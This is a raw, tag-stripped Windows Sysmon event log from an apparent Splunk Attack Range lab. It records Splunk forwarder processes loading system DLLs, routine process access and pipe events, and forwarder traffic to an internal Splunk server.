Inc.Valid 734700x800000000000000057344979Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344977Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344976Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344975Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344974Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344973Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344971Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344970Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344968Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344967Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344966Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344965Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057344964Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344963Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344962Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344961Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057344960Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344959Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344958Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344957Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344956Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x800000000000000057344955Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344954Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344953Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.139{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344952Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.139{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344951Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:11.139{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344950Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.139{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344949Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:11.139{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344948Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.139{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344947Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:11.139{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 354300x800000000000000021219453Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:59.506{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64311-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x800000000000000021219452Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.883{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64AF35EE175966382CB949995FE2A773,SHA256=2026C34EE207281241443A59F7997A14D52949951CBA839598E2DFC76774CF1C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.423{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345066Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.423{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC99B7D2F5F8DEF7350BDE6B5E00B70B,SHA256=9018A7C522950B7359D05CC5641585FA14985147488CDAEA9CB5FB09621C3DF6falsetrue 10341000x800000000000000021219451Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.242{AD5E2759-5B0C-618E-08CE-08000000F101}3132852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219450Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.070{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B0C-618E-08CE-08000000F101}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219449Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.070{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219448Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.070{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219447Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.070{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219446Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.070{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219445Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.070{AD5E2759-5432-6143-0500-00000000F101}412980C:\Windows\system32\csrss.exe{AD5E2759-5B0C-618E-08CE-08000000F101}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219444Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.070{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B0C-618E-08CE-08000000F101}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219443Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:12.056{AD5E2759-5B0C-618E-08CE-08000000F101}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 